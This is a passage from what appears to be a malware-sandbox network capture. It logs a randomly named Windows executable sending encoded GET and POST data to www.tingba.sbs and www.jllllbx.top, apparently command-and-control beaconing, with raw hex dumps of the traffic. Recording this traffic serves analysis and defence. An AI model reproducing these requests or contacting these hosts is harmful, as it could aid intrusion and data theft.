                                                        Nov 7, 2024 15:52:09.872524023 CET | 691 | IN | Data Raw: d0 ae d9 70 c4 91 26 27 0c 9d 14 86 53 39 c2 fc a2 34 8b cd 44 92 9d ad 39 20 a6 ec 64 de f8 c2 54 8a f1 54 ca 16 4a 97 41 0e da e8 62 5d 6f 14 4b f0 59 51 58 01 16 bb 36 70 33 9b 84 a8 cf 11 46 06 8f c1 54 2c 26 72 61 ad 5b 7e 59 20 a5 d9 88 fa
                                                        Data Ascii: p&'S94D9 dTTJAb]oKYQX6p3FT,&ra[~Y %rozV! \19,<:m2r@b)n+B#p;zb"vh/:dJBs/&@lC'n9+K]xPY@AE^2?@*k9r


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        28 | 192.168.2.10 | 50001 | 172.67.202.10 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:11.373037100 CET | 514 | OUT | GET /njro/?wFVH=-zwTKPF0iPth&eL-x=4m2dXuyzH1K67YjRiF0xgcinYZd6F04lkWHhJhjAgk74IEPWOAVZvwb6DAALc1Sd7YFs2hEz0292kCRHtftOb0bCUTNRw6g5HYfyDosdAoVL7yu4Ug== HTTP/1.1
                                                        Host: www.tingba.sbs
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:52:12.409739971 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:52:12 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3aVldNir6MSLrNhkt4pj0D6kS7J%2FRcfXH209pBJ9lmQ%2F8NMbYI1zs2jcdc%2B0vHj7jtY29lqQlQSxYexdIc6zob3MAhxaFIOPW4b5dQL%2F0A0ryBtl0XF9p3AFbWi%2BaLBvqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee254e6821b78c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2264&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=514&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 65 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 2f e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 2f 27 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 2c 64 69 76 2c 64 6c 2c 64 74 2c 64 64 2c 75 6c 2c 6f 6c 2c 6c 69 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 72 65 2c 63 6f 64 65 2c 66 6f 72 6d 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 2c 66 69 65 6c 64 73 65 74 2c 6c 65 [TRUNCATED]
                                                        Data Ascii: 1e86<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>404/</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="refresh" content='5; url=/'><style>body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,textarea,select,optgroup,option,fieldset,legend,p,blockquote,th,td{margin:0;padding:0}fieldset,img{border:0}ul,li,ol{list-style:none}h1,h2,h3,h4,h5,h6{fon
                                                        Nov 7, 2024 15:52:12.409813881 CET | 1236 | IN | Data Raw: 74 2d 73 69 7a 65 3a 31 30 30 25 7d 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 69 6e 70 75 74 2c 62 75 74 74 6f 6e 2c 74 65 78 74 61 72 65 61 2c 73 65 6c 65 63 74 2c 6f 70 74 67 72 6f 75 70 2c 6f 70 74 69 6f 6e 7b 66 6f 6e 74 2d 66 61
                                                        Data Ascii: t-size:100%}legend{color:#000}input,button,textarea,select,optgroup,option{font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit}input,button,select{margin:0;*font-size:100%;line-height:1.2}a img,img{-ms-interpolation-mo
                                                        Nov 7, 2024 15:52:12.409852028 CET | 1236 | IN | Data Raw: 56 42 37 49 73 46 32 31 63 79 2b 6c 69 6c 7a 4e 76 37 66 33 37 70 33 65 31 4d 2b 4c 61 30 31 7a 53 69 6e 73 39 50 72 71 71 6f 33 36 38 4c 32 34 6e 6e 58 77 30 7a 66 32 37 4a 54 77 35 49 7a 6d 31 34 58 48 71 46 66 4b 64 43 66 4e 34 76 50 77 37 4f
                                                        Data Ascii: VB7IsF21cy+lilzNv7f37p3e1M+La01zSins9Prqqo368L24nnXw0zf27JTw5Izm14XHqFfKdCfN4vPw7On5/P7JtnLvx5GpWBy1nGPu235/QxmFuuOmaifaulvm1HzmzW7NvZJkOCF9WDPfzXrXz8ymj4SBXUiv0uykhkfe3Nqsi0m+qZn587X40s73362Rc2OchHT26ZaSwOakjXr0wEbe6fHEdCi4nlnLuH6ym4jlxm7znju
                                                        Nov 7, 2024 15:52:12.410378933 CET | 1236 | IN | Data Raw: 41 42 5a 30 52 56 68 30 51 33 4a 6c 59 58 52 70 62 32 34 67 56 47 6c 74 5a 51 41 78 4d 53 38 77 4e 69 38 78 4d 39 46 35 30 32 30 41 41 41 41 63 64 45 56 59 64 46 4e 76 5a 6e 52 33 59 58 4a 6c 41 45 46 6b 62 32 4a 6c 49 45 5a 70 63 6d 56 33 62 33
                                                        Data Ascii: ABZ0RVh0Q3JlYXRpb24gVGltZQAxMS8wNi8xM9F5020AAAAcdEVYdFNvZnR3YXJlAEFkb2JlIEZpcmV3b3JrcyBDUzVxteM2AAARmElEQVR4nL2cD1xT57nH38PoXdkNjg28YLFSV7AQWipiuM4TVoiTLKKEvx1FodGO21b+2I3cLabFFqfB2kId1uBAEBnbh9ALkdEqUv/0ci8JE0VspqXEAcKqK5jibb3VXrxz7zn5n3NO8p6
                                                        Nov 7, 2024 15:52:12.410394907 CET | 848 | IN | Data Raw: 78 63 59 43 36 63 64 69 73 64 41 6a 48 79 53 45 52 74 51 32 63 37 75 4b 46 35 4d 6d 56 66 67 53 73 64 69 54 67 36 31 75 7a 6a 38 4a 43 74 79 4e 66 67 37 71 39 67 32 67 68 63 2b 7a 67 30 6d 74 79 73 39 2f 58 46 44 75 65 56 5a 46 79 4e 6e 55 58 41
                                                        Data Ascii: xcYC6cdisdAjHySERtQ2c7uKF5MmVfgSsdiTg61uzj8JCtyNfg7q9g2ghc+zg0mtys9/XFDueVZFyNnUXAFFPJIPxcFWwi/K1O6mLFYZL/sEsFpN8LnPMDZVnfz8+un0L95YqW30fObnfALopz0gRnVw0rnLU9XamcIbS786AyY8nTm+6/c+ANwJisSoDk7l9RlSAChXiEqePJMu3eqBb3escwtOgCmKDoIPKYLPvUgcMaEqJCK
                                                        Nov 7, 2024 15:52:12.411174059 CET | 1236 | IN | Data Raw: 4a 53 43 64 41 51 2f 6c 75 48 6a 46 34 47 65 32 34 56 44 64 6c 30 54 58 65 2f 2f 6e 57 79 44 64 6a 78 30 50 79 53 63 43 70 57 75 64 30 31 71 45 32 63 50 74 76 2f 55 4b 55 45 4e 6a 51 4f 47 41 36 38 53 33 52 4d 4f 7a 58 72 71 31 74 66 56 35 56 7a
                                                        Data Ascii: JSCdAQ/luHjF4Ge24VDdl0TXe//nWyDdjx0PyScCpWud01qE2cPtv/UKUENjQOGA68S3RMOzXrq1tfV5VzqcqLBLDx2imU7L5WVPeAVYQGPAcy7LG1dgzitcQr2404c6lERXCYnlx0+7eoMV4AxNCA85jmbGlDDNzsbs1Svd4yVV0b+xSV5xxvWarADPKqgGHLAmtCszmsZC3kDO6pWzDNf3JKVcnvFLbwCNijqKAVPNUxzjjKa
                                                        Nov 7, 2024 15:52:12.411195993 CET | 1236 | IN | Data Raw: 61 4b 6b 62 37 4f 71 61 7a 65 7a 77 2b 43 6b 6f 49 73 4e 6b 46 5a 35 42 75 37 69 4f 43 4e 6a 5a 34 74 51 46 68 55 6d 51 63 47 69 57 33 4c 58 51 4d 6a 69 59 57 70 63 61 6b 55 6d 43 6a 55 55 57 73 65 59 7a 6d 37 41 55 72 36 50 31 4d 53 4b 67 64 68
                                                        Data Ascii: aKkb7Oqazezw+CkoIsNkFZ5Bu7iOCNjZ4tQFhUmQcGiW3LXQMjiYWpcakUmCjUUWseYzm7AUr6P1MSKgdhYpRlYMsncwbvVxJQijuTIaYApAujW84niGp60qtCLjGMfVdLsj0QD7QCZCEG9qymDfAW2Aq/DtdPeg0AA1KICbmho8TS0ZZImSLhVnwCywzBOg8iV5+yA3PitgKl2UoAFe8ggobGqKjOS47EZWNBBwlg4GDTAATLs
                                                        Nov 7, 2024 15:52:12.411969900 CET | 1236 | IN | Data Raw: 57 5a 30 6e 4c 6f 68 64 78 48 68 4c 79 63 77 47 36 66 49 43 31 54 6e 4e 78 66 44 77 34 62 66 33 2f 69 6d 35 32 4b 77 73 62 55 35 4f 74 2b 57 78 38 30 57 47 6f 2f 6e 38 5a 45 36 41 2f 6e 50 59 66 34 65 47 33 33 55 6c 68 4c 35 32 68 62 53 79 69 54
                                                        Data Ascii: WZ0nLohdxHhLycwG6fIC1TnNxfDw4bf3/im52KwsbU5Ot+Wx80WGo/n8ZE6A/nPYf4eG33UlhL52hbSyiTfGRUK6f/+rBOPXx+j27tUXW9U2EC8ttDx2jY3hXKzenz2gjr8rxmA8C9qXUBFtlBBt2vrKkqL9ArXqBrmq5q+vx7C3bXjFGnVWcRYvwPyEOuSNSPgjbAFN2Bz5SRMGtPtjaREddeEuNJ2gbcphPPPXXbEDqgoIyhr
                                                        Nov 7, 2024 15:52:12.412015915 CET | 1133 | IN | Data Raw: 47 4b 53 77 66 4a 4f 4d 6a 35 6e 4d 6f 55 51 79 6f 30 61 33 77 56 4c 76 76 71 51 59 4a 66 47 4c 4a 63 2b 59 47 6b 57 35 58 6f 4b 68 33 66 48 36 57 6f 31 46 2f 6e 4c 72 4b 4e 72 59 6b 78 49 62 72 32 73 58 77 4c 56 50 78 36 56 71 39 66 52 2b 5a 33
                                                        Data Ascii: GKSwfJOMj5nMoUQyo0a3wVLvvqQYJfGLJc+YGkW5XoKh3fH6Wo1F/nLrKNrYkxIbr2sXwLVPx6Vq9fR+Z31N7STJVh/CJ0ZR4hsZQs+JolC+JJgNtfj8CsBI3Owo8zpR+wR468LqSc6T6IhuB+75QZRBD+eid24ze23PkZM47AH8SUy2bhMJiHWSev1Fi6IUK+jZ0iM5mNzbPsw91/s8dclh5hyc3NN+pgRp/QTM47xo5Jd+pNI


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        29 | 192.168.2.10 | 50002 | 156.234.28.94 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:18.563327074 CET | 767 | OUT | POST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4a 78 75 36 4a 58 78 2b 58 4a 67 66 6e 76 50 4c 5a 76 6a 58 39 62 59 78 70 56 4e 68 73 39 65 30 32 33 2b 56 75 69 64 48 5a 31 4d 78 54 5a 66 72 6d 54 61 39 76 74 4c 58 57 75 79 52 65 31 50 7a 70 7a 47 70 63 63 36 50 31 79 62 79 64 39 4c 41 79 33 58 48 48 75 79 47 4a 38 73 64 33 2f 36 4d 4a 61 74 4d 6b 59 68 56 4e 37 71 6f 4d 78 6d 48 44 68 54 4e 34 75 58 35 75 36 4d 2b 67 4c 2f 50 53 42 75 57 54 39 46 5a 39 6f 6b 56 58 56 61 6c 36 6d 51 39 42 50 35 54 41 37 54 6f 4b 4c 56 55 2f 55 39 74 38 6c 74 30 45 6b 6c 4d 33 58 53 62
                                                        Data Ascii: eL-x=ce6f4sP6zAtbJxu6JXx+XJgfnvPLZvjX9bYxpVNhs9e023+VuidHZ1MxTZfrmTa9vtLXWuyRe1PzpzGpcc6P1ybyd9LAy3XHHuyGJ8sd3/6MJatMkYhVN7qoMxmHDhTN4uX5u6M+gL/PSBuWT9FZ9okVXVal6mQ9BP5TA7ToKLVU/U9t8lt0EklM3XSb
                                                        Nov 7, 2024 15:52:19.725002050 CET | 1135 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        30 | 192.168.2.10 | 50003 | 156.234.28.94 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:21.114036083 CET | 791 | OUT | POST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4b 53 32 36 4f 41 6c 2b 66 4a 67 51 72 50 50 4c 41 2f 6a 54 39 62 55 78 70 52 38 6b 74 50 36 30 32 54 75 56 2f 51 31 48 61 31 4d 78 59 35 66 71 69 54 61 49 76 74 47 69 57 75 2b 52 65 31 62 7a 70 78 4f 70 64 72 75 49 31 69 62 38 55 64 4c 43 32 33 58 48 48 75 79 47 4a 2f 51 33 33 2f 79 4d 4b 70 46 4d 6c 35 68 4b 46 62 71 70 4c 78 6d 48 49 42 54 42 34 75 58 68 75 34 6f 41 67 4a 48 50 53 45 71 57 57 35 5a 61 6d 34 6b 54 59 31 62 78 2f 45 78 77 42 39 35 73 43 6f 50 43 64 34 74 55 34 31 41 71 74 30 4d 6a 58 54 35 43 35 52 6e 78 6c 4f 6c 71 77 53 52 53 62 65 4b 35 36 59 56 62 58 42 73 77 53 67 3d 3d
                                                        Data Ascii: eL-x=ce6f4sP6zAtbKS26OAl+fJgQrPPLA/jT9bUxpR8ktP602TuV/Q1Ha1MxY5fqiTaIvtGiWu+Re1bzpxOpdruI1ib8UdLC23XHHuyGJ/Q33/yMKpFMl5hKFbqpLxmHIBTB4uXhu4oAgJHPSEqWW5Zam4kTY1bx/ExwB95sCoPCd4tU41Aqt0MjXT5C5RnxlOlqwSRSbeK56YVbXBswSg==
                                                        Nov 7, 2024 15:52:22.067702055 CET | 1135 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        31 | 192.168.2.10 | 50004 | 156.234.28.94 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:23.659780979 CET | 1804 | OUT | POST /14ny/ HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.jllllbx.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.jllllbx.top/14ny/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 63 65 36 66 34 73 50 36 7a 41 74 62 4b 53 32 36 4f 41 6c 2b 66 4a 67 51 72 50 50 4c 41 2f 6a 54 39 62 55 78 70 52 38 6b 74 50 79 30 32 42 6d 56 74 42 31 48 62 31 4d 78 47 4a 66 76 69 54 61 56 76 74 65 35 57 75 44 6b 65 32 6a 7a 70 55 43 70 61 66 43 49 37 69 62 38 5a 39 4c 42 79 33 58 53 48 76 43 43 4a 38 34 33 33 2f 79 4d 4b 73 42 4d 69 6f 68 4b 48 62 71 6f 4d 78 6d 78 44 68 54 74 34 75 50 78 75 34 39 37 67 34 6e 50 56 6b 36 57 52 63 46 61 71 34 6b 52 62 31 62 35 2f 45 38 77 42 39 31 4b 43 72 54 6f 64 37 4e 55 37 7a 56 53 34 55 51 47 55 68 5a 61 31 77 54 62 69 37 56 5a 30 6a 55 76 58 74 57 6c 6b 5a 45 4b 57 78 31 6e 4e 2b 64 34 39 72 4a 62 66 7a 63 6a 2f 45 30 56 47 7a 4f 71 42 49 67 32 51 59 57 74 55 4a 71 33 6a 37 30 64 57 2b 2f 38 6b 2b 73 48 42 45 38 53 54 34 65 7a 45 7a 46 66 37 4f 66 79 32 58 63 34 42 5a 49 37 56 7a 34 66 6c 58 2b 6a 44 49 39 6b 36 70 41 63 35 58 65 48 52 49 2b 6d 45 2f 73 65 33 78 53 5a 39 50 4d 6a 37 52 30 72 79 76 66 52 76 6b 57 39 50 77 67 49 6b 55 66 71 46 [TRUNCATED]
                                                        Data Ascii: eL-x= [TRUNCATED]
                                                        Nov 7, 2024 15:52:24.672694921 CET | 1135 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 33 39 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 55 5b 8b 1c 45 14 7e 17 fc 0f 65 2f 86 19 e8 9d ae 5b df 76 ba 07 64 d5 a7 40 04 e3 83 8f bd d3 b5 33 a5 db dd 43 77 ed cc 2c 21 0f 42 40 10 23 fa 24 8a a2 78 c1 80 24 fa 20 28 9a e0 9f c9 ee ac 4f f9 0b 9e 53 35 33 d9 2c ea e6 c5 61 ba 4e 9d 4b 9d cb 57 55 a7 b2 97 5e bd b1 7f f3 ed 37 5e 23 53 53 1d 8d 5e 7c 21 db 52 55 94 c0 93 ac 52 a6 20 e3 69 d1 76 ca e4 de 5b 37 5f df 4d 3c 54 c0 cf e9 74 99 7b 73 ad 16 b3 a6 35 1e a9 8b 4a 5d e4 c7 4d 6d 54 0d 2b 17 ba 34 d3 bc 54 73 3d 56 bb 96 f1 2b 5d eb ea b8 da ed c6 c5 91 ca d9 80 fa 55 b1 bc 24 39 ee 54 6b 0d 8a 03 b0 a9 1b 8c 9d 19 6d 8e d4 e8 da 4e 22 87 d7 76 a2 18 86 98 c1 c0 a5 e4 21 50 c1 68 42 91 17 52 26 c8 f3 30 15 40 25 2a 23 1c ac da 0e 2c 4d e3 14 6d a2 58 88 61 16 38 d7 10 c3 d6 ed aa 79 57 9d 2c 9a b6 ec 3c b2 ad e6 7f 88 ed 05 58 da 85 b0 a5 ea c6 ad 9e 19 dd d4 cf 44 4e 53 86 25 47 21 15 98 f9 7f b3 57 40 74 09 8d 30 14 61 04 3e c3 98 49 c4 96 71 c4 95 51 8c 27 31 98 d3 a2 89 c4 21 75 09 [TRUNCATED]
                                                        Data Ascii: 396U[E~e/[vd@3Cw,!B@#$x$ (OS53,aNKWU^7^#SS^|!RUR iv[7_M<Tt{s5J]MmT+4Ts=V+]U$9TkmN"v!PhBR&0@%*#,MmXa8yW,<XDNS%G!W@t0a>IqQ'1!uYbaL@X!mdnd[c09R*7) G4>X#a<QaC]>#E):{(pJa,zK0F9C6TwMuPt9U/lN!nFYpaVN)2v[9;;#}ixw_zzP~^R-oB^9e[e3>"$V>YoO;vuu?OW?}=<|1'3hVF-MN1/y!9yGP@hA2?c"?MSt FCkpqt"-V[x9:-[cFY3,=BUNtO,b/X@UZjv_Lar0K='a|Yd0e@xt1X;0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.10 | 50005 | 156.234.28.94 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:52:26.199745893 CET | 515 | OUT | GET /14ny/?eL-x=RcS/7b6AyQg4ZUqZZRdiR4QAk8bBBIP44+AM+xEUzuW33DbFu14QWxhHRozVg07q+e31G6ugIhvO9kCRCtuNtETua9CX3TPbBNSnRMkK6/CxEYN7+Q==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.jllllbx.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:52:27.156936884 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 07 Nov 2024 14:52:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
